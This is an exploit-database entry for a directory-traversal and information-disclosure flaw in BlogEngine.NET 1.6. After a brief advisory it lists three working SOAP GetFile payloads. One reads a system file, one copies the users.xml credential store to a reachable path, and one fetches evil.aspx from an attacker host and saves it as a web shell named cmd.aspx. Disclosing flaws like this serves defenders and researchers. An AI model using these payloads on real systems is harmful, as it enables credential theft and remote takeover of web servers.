BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure

Author: Deniz Cevik
type: webapps
platform: asp
port: 
date_added: 2011-01-05 
date_updated: 2014-11-06 
verified: 1 
codes: OSVDB-70311 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/45681/info

BlogEngine.NET is prone to a directory-traversal vulnerability and an information-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting the issues may allow an attacker to obtain sensitive information and upload arbitrary files to the webserver that could aid in further attacks.

BlogEngine.NET 1.6 is vulnerable.

The following example SOAP requests are available:

1. <GetFile xmlns="http://dotnetblogengine.net/">
<source>c:\Windows\win.ini</source>
<destination>string</destination>
</GetFile>

2. <GetFile xmlns="http://dotnetblogengine.net/">
<source>c:\webroot\blog\App_Data\users.xml</source>
<destination>../../aa.txt</destination>
</GetFile>

3. <GetFile xmlns="http://dotnetblogengine.net/">
<source>http://attacker/evil.aspx</source>
<destination>/../../cmd.aspx</destination>
</GetFile>